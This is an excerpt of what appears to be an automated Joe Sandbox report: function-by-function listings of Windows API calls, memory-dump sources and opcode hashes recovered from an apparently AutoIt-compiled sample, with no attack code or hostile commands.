                                                        Function 00140FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00140FD4
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00140FFE
                                                        • FreeLibrary.KERNEL32(00000000), ref: 001410B5
                                                          • Part of subcall function 00140FA5: RegCloseKey.ADVAPI32(?), ref: 0014101B
                                                          • Part of subcall function 00140FA5: FreeLibrary.KERNEL32(?), ref: 0014106D
                                                          • Part of subcall function 00140FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00141090
                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00141058
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                        • String ID:
                                                        • API String ID: 395352322-0
                                                        • Opcode ID: 3687a217598a4ca3bc5bb309699cfb5413da5dc981805ea4b21e1e5e98778c29
                                                        • Instruction ID: bc558bd925c70e86af5a3cb62b158ad984fe6bb7b5badf94d4da8bcdd1cb1e7e
                                                        • Opcode Fuzzy Hash: 3687a217598a4ca3bc5bb309699cfb5413da5dc981805ea4b21e1e5e98778c29
                                                        • Instruction Fuzzy Hash: E931FB75901109BFDB159F90DC89EFEB7BCEF09350F000169F511A3261EB759EC99AA0
                                                        Function 001462CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 001462EC
                                                        • GetWindowLongW.USER32(01444A18,000000F0), ref: 0014631F
                                                        • GetWindowLongW.USER32(01444A18,000000F0), ref: 00146354
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00146386
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 001463B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 001463C1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 001463DB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID:
                                                        • API String ID: 2178440468-0
                                                        • Opcode ID: d9b42737efdcb0bbec675c9a2e6ed1da8d2ba424bb9712e08d64879e14558f61
                                                        • Instruction ID: 8749af41dd0e9777c93dee4bb1d5fde91c06a55852daf98a3e351f39ee54b549
                                                        • Opcode Fuzzy Hash: d9b42737efdcb0bbec675c9a2e6ed1da8d2ba424bb9712e08d64879e14558f61
                                                        • Instruction Fuzzy Hash: FF31F138644290AFDB20CF19DC88F5937E1FB4B758F1901A9F5099F6B2CB71AC819B52
                                                        Function 0011DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DB2E
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DB54
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0011DB57
                                                        • SysAllocString.OLEAUT32(?), ref: 0011DB75
                                                        • SysFreeString.OLEAUT32(?), ref: 0011DB7E
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0011DBA3
                                                        • SysAllocString.OLEAUT32(?), ref: 0011DBB1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 5b73ad22bdc9692ce3fe5e3c85e4789390e4e50e56744a045735b1e3b3dc6aff
                                                        • Instruction ID: dbffd4f15b2262c637ed2d22db3134e1e9f266f22146d066c613bb084c172121
                                                        • Opcode Fuzzy Hash: 5b73ad22bdc9692ce3fe5e3c85e4789390e4e50e56744a045735b1e3b3dc6aff
                                                        • Instruction Fuzzy Hash: A0218E76604219AFDF14DFA9EC88CFB73ACEB0A360B058539F915DB261DB709C818764
                                                        Function 00136173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00137D8B: inet_addr.WSOCK32(00000000), ref: 00137DB6
                                                        • socket.WSOCK32(00000002,00000001,00000006), ref: 001361C6
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001361D5
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0013620E
                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00136217
                                                        • WSAGetLastError.WSOCK32 ref: 00136221
                                                        • closesocket.WSOCK32(00000000), ref: 0013624A
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00136263
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                        • String ID:
                                                        • API String ID: 910771015-0
                                                        • Opcode ID: cce785949c8cfad44c0d72559eb3c49e7821a0ca6db3757e26a7d982d7bd26c9
                                                        • Instruction ID: 29c3a40a6292b392f9183b85b119d39ad4c1f5d16785974879152d82d073e9cb
                                                        • Opcode Fuzzy Hash: cce785949c8cfad44c0d72559eb3c49e7821a0ca6db3757e26a7d982d7bd26c9
                                                        • Instruction Fuzzy Hash: A731A175600118AFEF10AF64CC89FBE7BA9EB45750F05802DF905AB292CB74AC458BA1
                                                        Function 0011F65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 1038674560-2734436370
                                                        • Opcode ID: 2dcc6f9adecedc8bc102f8164fc0c39858d9324238787d68e88357bf97a68418
                                                        • Instruction ID: 0ab5cb7e7729869ef4686cc8df107f2cd6a9262a5d863a49c18d66f399616032
                                                        • Opcode Fuzzy Hash: 2dcc6f9adecedc8bc102f8164fc0c39858d9324238787d68e88357bf97a68418
                                                        • Instruction Fuzzy Hash: 5E213AB22046516AD238A635AC02EEB7398DF56340F10403DF84697192EB515DC7C295
                                                        Function 0011DBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DC09
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0011DC2F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 0011DC32
                                                        • SysAllocString.OLEAUT32 ref: 0011DC53
                                                        • SysFreeString.OLEAUT32 ref: 0011DC5C
                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0011DC76
                                                        • SysAllocString.OLEAUT32(?), ref: 0011DC84
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                        • String ID:
                                                        • API String ID: 3761583154-0
                                                        • Opcode ID: 6d1f2bef5a81ea7376782d54436e5d0a91354bd0d7719d9f8b12ef39cd8d1181
                                                        • Instruction ID: 1536cf7cd2b6f7ea577808d001aa43bdee56f8f4152ff36988784b53b89d9846
                                                        • Opcode Fuzzy Hash: 6d1f2bef5a81ea7376782d54436e5d0a91354bd0d7719d9f8b12ef39cd8d1181
                                                        • Instruction Fuzzy Hash: F8216035604204AF9B149FA8EC89DEB77ECEB09360B158539F915CB261DBB0DC81CBA4
                                                        Function 001475CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000C1D73
                                                          • Part of subcall function 000C1D35: GetStockObject.GDI32(00000011), ref: 000C1D87
                                                          • Part of subcall function 000C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C1D91
                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00147632
                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0014763F
                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0014764A
                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00147659
                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00147665
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                        • String ID: Msctls_Progress32
                                                        • API String ID: 1025951953-3636473452
                                                        • Opcode ID: 96cdd538b4e191e0a4b17f34de67e7492c17605b5dfdc0b23fa7bb450e5c8f09
                                                        • Instruction ID: 2142f989de7d3c16f94674d2dfbc10b1e00d3def0f6f3f44e8dac02aef225931
                                                        • Opcode Fuzzy Hash: 96cdd538b4e191e0a4b17f34de67e7492c17605b5dfdc0b23fa7bb450e5c8f09
                                                        • Instruction Fuzzy Hash: 3B11B6B1110119BFFF158F64CC85EE7BF6EEF08798F014114B604A60A0CB729C21DBA4
                                                        Function 000E9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __init_pointers.LIBCMT ref: 000E9AE6
                                                          • Part of subcall function 000E3187: EncodePointer.KERNEL32(00000000), ref: 000E318A
                                                          • Part of subcall function 000E3187: __initp_misc_winsig.LIBCMT ref: 000E31A5
                                                          • Part of subcall function 000E3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 000E9EA0
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 000E9EB4
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 000E9EC7
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 000E9EDA
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 000E9EED
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 000E9F00
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 000E9F13
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 000E9F26
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 000E9F39
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 000E9F4C
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 000E9F5F
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 000E9F72
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 000E9F85
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 000E9F98
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 000E9FAB
                                                          • Part of subcall function 000E3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 000E9FBE
                                                        • __mtinitlocks.LIBCMT ref: 000E9AEB
                                                        • __mtterm.LIBCMT ref: 000E9AF4
                                                          • Part of subcall function 000E9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,000E9AF9,000E7CD0,0017A0B8,00000014), ref: 000E9C56
                                                          • Part of subcall function 000E9B5C: _free.LIBCMT ref: 000E9C5D
                                                          • Part of subcall function 000E9B5C: DeleteCriticalSection.KERNEL32(0017EC00,?,?,000E9AF9,000E7CD0,0017A0B8,00000014), ref: 000E9C7F
                                                        • __calloc_crt.LIBCMT ref: 000E9B19
                                                        • __initptd.LIBCMT ref: 000E9B3B
                                                        • GetCurrentThreadId.KERNEL32 ref: 000E9B42
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                        • String ID:
                                                        • API String ID: 3567560977-0
                                                        • Opcode ID: 7ffd43cba987decbbf174081ea2237008efa664d75946834edd7b839879446c0
                                                        • Instruction ID: e8f866fd0462da37343e2ef30c28485fc061ab4a21e3349d9d80707851dc1bb6
                                                        • Opcode Fuzzy Hash: 7ffd43cba987decbbf174081ea2237008efa664d75946834edd7b839879446c0
                                                        • Instruction Fuzzy Hash: 54F0F03260D3A12EE7B4B777BC036CA26D19F02734F210A2DF564F61E3EF20848101A1
                                                        Function 000E406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000E3F85), ref: 000E4085
                                                        • GetProcAddress.KERNEL32(00000000), ref: 000E408C
                                                        • EncodePointer.KERNEL32(00000000), ref: 000E4097
                                                        • DecodePointer.KERNEL32(000E3F85), ref: 000E40B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                        • String ID: RoUninitialize$combase.dll
                                                        • API String ID: 3489934621-2819208100
                                                        • Opcode ID: cbbf1276e2056119547f33c606805eee99bdc9d35b751283e907ed8f0ddef8a0
                                                        • Instruction ID: e72ae330d7c976ae4ad7276c1be6d0efeeb503bcc72c27d6809a1dced6410721
                                                        • Opcode Fuzzy Hash: cbbf1276e2056119547f33c606805eee99bdc9d35b751283e907ed8f0ddef8a0
                                                        • Instruction Fuzzy Hash: 32E0B674581300EFEB60AFA1EC0DB053AE4B706F42F144028F521E5AB0CBB68785DB24
                                                        Function 001264B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 3253778849-0
                                                        • Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                        • Instruction ID: 48bb97577f499353bdcbb670ff551d8c81492ba1e1aca33beeffd4c891211df8
                                                        • Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                        • Instruction Fuzzy Hash: 6F619A305002AAABCF05EF60DC86EFE37A9AF05708F054568F8596B2A3DB74ED55CB50
                                                        Function 001401E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001402BD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001402FD
                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00140320
                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00140349
                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0014038C
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00140399
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                        • String ID:
                                                        • API String ID: 4046560759-0
                                                        • Opcode ID: 632d8a208d16f9dac1e5ffd5b7489cda76d975c60b13488de9cc20630c51c37b
                                                        • Instruction ID: bd0536b726990dfb11fac2f2fb748ed34c46f5eb1fd3bd94d9c00b7115150a6a
                                                        • Opcode Fuzzy Hash: 632d8a208d16f9dac1e5ffd5b7489cda76d975c60b13488de9cc20630c51c37b
                                                        • Instruction Fuzzy Hash: F8515831208200AFC715EF64C885EAFBBE9FF89314F04492DF5858B2A2DB71E945CB52
                                                        Function 00145799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetMenu.USER32(?), ref: 001457FB
                                                        • GetMenuItemCount.USER32(00000000), ref: 00145832
                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0014585A
                                                        • GetMenuItemID.USER32(?,?), ref: 001458C9
                                                        • GetSubMenu.USER32(?,?), ref: 001458D7
                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00145928
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Item$CountMessagePostString
                                                        • String ID:
                                                        • API String ID: 650687236-0
                                                        • Opcode ID: 0657d830b990540f31a5d31016b3cdd354be2993714883a0f7cd9d5c2e870d33
                                                        • Instruction ID: 207d7544c2dc10e73adf2b0172bee10b5ba18b9b3decbf91d01b5a28894ac4b8
                                                        • Opcode Fuzzy Hash: 0657d830b990540f31a5d31016b3cdd354be2993714883a0f7cd9d5c2e870d33
                                                        • Instruction Fuzzy Hash: EE515C35E00616EFCF15DF65C845AEEBBB5EF49720F114069E911BB362CB70AE418B90
                                                        Function 0011EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0011EF06
                                                        • VariantClear.OLEAUT32(00000013), ref: 0011EF78
                                                        • VariantClear.OLEAUT32(00000000), ref: 0011EFD3
                                                        • _memmove.LIBCMT ref: 0011EFFD
                                                        • VariantClear.OLEAUT32(?), ref: 0011F04A
                                                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0011F078
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$Clear$ChangeInitType_memmove
                                                        • String ID:
                                                        • API String ID: 1101466143-0
                                                        • Opcode ID: 5bf7667308de254180ae935ad420e439c8d51ad8176bab3ff3245e375b2ef254
                                                        • Instruction ID: f2e8bb58afe1bab67520ac791de5787304a7d237fa4aac418e002293de8b6e69
                                                        • Opcode Fuzzy Hash: 5bf7667308de254180ae935ad420e439c8d51ad8176bab3ff3245e375b2ef254
                                                        • Instruction Fuzzy Hash: E75147B5A00209EFCB14CF58C884AAAB7F9FF4C314B158569F959DB311E734E952CBA0
                                                        Function 0012220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 00122258
                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001222A3
                                                        • IsMenu.USER32(00000000), ref: 001222C3
                                                        • CreatePopupMenu.USER32 ref: 001222F7
                                                        • GetMenuItemCount.USER32(000000FF), ref: 00122355
                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00122386
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
